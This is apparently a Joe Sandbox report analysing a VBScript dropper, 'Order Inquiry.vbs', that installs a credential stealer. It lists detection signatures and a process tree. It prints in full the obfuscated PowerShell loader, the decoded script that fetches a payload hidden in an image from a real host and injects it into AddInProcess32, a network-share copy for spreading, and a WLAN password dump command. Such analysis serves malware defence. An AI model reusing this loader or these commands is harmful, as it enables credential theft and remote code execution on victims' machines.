Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order Inquiry.vbs

Overview

General Information

Sample name:Order Inquiry.vbs
Analysis ID:1457271
MD5:443f85c9a27129786164968923b47193
SHA1:a45f63374b28561a0152e261bd57e5a2bb9c54f9
SHA256:f3ff35c81d1f64fe7a0f1fb55e1c732d091b8faedc4fcd35eef9d0afe5455a63
Tags:Formbookvbs
Infos:

Detection

PXRECVOWEIWOEI Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Capture Wi-Fi password
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected PXRECVOWEIWOEI Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Opens network shares
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBkDgTreHIDgTrebwB3DgTreHMDgTreLwDgTrexDgTreDcDgTreLgDgTre5DgTreDMDgTreLgDgTrezDgTreDIDgTreMQDgTreuDgTreDMDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBcDgTreFwDgTredDgTreBzDgTreGMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreFwDgTreQwBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreIDgTreBGDgTreGkDgTrebDgTreBlDgTreHMDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYQBiDgTreHUDgTrecgByDgTreGEDgTrecgDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AddInProcess32.exe (PID: 8168 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
          • cmd.exe (PID: 1160 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1848 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 3276 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 4124 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • msiexec.exe (PID: 3232 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
    Process Memory Space: powershell.exe PID: 7772JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7772INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x55b80:$b2: ::FromBase64String(
      • 0x57040:$b2: ::FromBase64String(
      • 0x57653:$b2: ::FromBase64String(
      • 0x57d81:$b2: ::FromBase64String(
      • 0x58346:$b2: ::FromBase64String(
      • 0x559e5:$b3: ::UTF8.GetString(
      • 0x56ea5:$b3: ::UTF8.GetString(
      • 0x574b8:$b3: ::UTF8.GetString(
      • 0x57be6:$b3: ::UTF8.GetString(
      • 0x581ab:$b3: ::UTF8.GetString(
      • 0x434bd:$s1: -join
      • 0x465d6:$s1: -join
      • 0x66463:$s3: reverse
      • 0x66751:$s3: reverse
      • 0x66e6b:$s3: reverse
      • 0x67624:$s3: reverse
      • 0x6e7bf:$s3: reverse
      • 0x6ebd9:$s3: reverse
      • 0x6f761:$s3: reverse
      • 0x7040e:$s3: reverse
      • 0x80ed1:$s3: reverse
      Process Memory Space: powershell.exe PID: 7908JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 7908INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1d0b4:$b2: ::FromBase64String(
        • 0x1d80f:$b2: ::FromBase64String(
        • 0x1ddd4:$b2: ::FromBase64String(
        • 0x1f535:$b2: ::FromBase64String(
        • 0x1faef:$b2: ::FromBase64String(
        • 0x2091f:$b2: ::FromBase64String(
        • 0x1ad183:$b2: ::FromBase64String(
        • 0x1ad6cb:$b2: ::FromBase64String(
        • 0x673da5:$b2: ::FromBase64String(
        • 0x67435f:$b2: ::FromBase64String(
        • 0x67a96d:$b2: ::FromBase64String(
        • 0x67bfa6:$b2: ::FromBase64String(
        • 0x684564:$b2: ::FromBase64String(
        • 0x1cf19:$b3: ::UTF8.GetString(
        • 0x1d674:$b3: ::UTF8.GetString(
        • 0x1dc39:$b3: ::UTF8.GetString(
        • 0x1f39a:$b3: ::UTF8.GetString(
        • 0x1f954:$b3: ::UTF8.GetString(
        • 0x20784:$b3: ::UTF8.GetString(
        • 0x1acfe8:$b3: ::UTF8.GetString(
        • 0x1ad530:$b3: ::UTF8.GetString(
        Click to see the 3 entries

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_7908.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          Spreading

          barindex
          Sigma detected: Powershell download payload from hardcoded c2 list
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base

          System Summary

          barindex
          Sigma detected: Base64 Encoded PowerShell Command Detected
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgT